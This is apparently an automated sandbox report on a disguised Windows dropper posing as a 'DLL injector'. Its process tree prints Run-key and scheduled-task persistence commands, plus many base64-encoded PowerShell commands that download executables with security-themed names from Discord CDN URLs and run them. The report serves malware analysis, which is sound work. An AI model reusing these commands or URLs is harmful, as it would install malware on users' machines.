Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 8, 2022, 9:35 a.m.	Nov. 8, 2022, 9:40 a.m.

Size	305.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b28a3a496bb68f9c4308ee7d888e7a27`
SHA256	`985eb402fa66d0ab3594346f7fc61acc0cf0ee8449a5e66d387b9edfaed7e0d9`
CRC32	`2CE82044`
ssdeep	`6144:BoXVkyjpPglDUzV5SZ7KVCgH6kZSPEVRyEPZ3:WlwlDUoqHY4RyKZ3`
Yara	IsPE32 - (no description) Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer

Dll%20Injector%20V5%20Full%E2%80%AEnls..scr "C:\Users\test22\AppData\Local\Temp\Dll%20Injector%20V5%20Full%E2%80%AEnls..scr"
2640
- RegAsm.exe #cmd
  2732
  - WINDOWSHELLHOSTT.EXE "C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE"
    2816
    - powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String'
      2884
    - cmd.exe "cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      2932
      - schtasks.exe schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        3004
    - RegAsm.exe #cmd
      3044
      - DEFENDERRUNTIME.EXE "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE"
        1384
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"
        3080
      - DEFENDERRUNTIMEE.EXE "C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE"
        2100
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"
        176
      - FILEMANAGE.EXE "C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE"
        196
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="
        2400
      - FILEMANAGER.EXE "C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE"
        2196
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"
        3100
      - REDLINESECURITY.EXE "C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE"
        2260
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A"
        1168
      - REDLINESECURTY.EXE "C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE"
        2456
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A"
        3196
      - S500UBNAN.EXE "C:\Users\test22\AppData\Roaming\S500UBNAN.EXE"
        2584
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA=="
        1376
      - SECURITYHEALTHSERVICE.EXE "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE"
        2764
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA="
        1948
      - SECURITYHEALTHSEURVIC.EXE "C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE"
        2692
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA="
        3116
      - SECURITYHOST.EXE "C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE"
        2900
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA="
        1632
      - WINDOWSDEFENDERSMART.EXE "C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE"
        2964
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A"
        2072
      - WINDOWSPROTECT.EXE "C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE"
        3032
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA="
        2780

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 55 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
